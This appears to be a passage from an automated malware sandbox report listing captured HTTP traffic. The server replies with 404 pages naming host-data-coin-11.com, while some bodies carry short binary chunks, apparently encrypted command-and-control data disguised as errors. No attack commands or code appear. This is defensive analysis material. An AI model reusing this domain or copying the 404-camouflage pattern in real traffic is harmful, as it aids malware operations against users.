                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4c 47 bb 29 c4 b0 66 d3 2f 41 0b ac b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OTevLG)f/AW0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 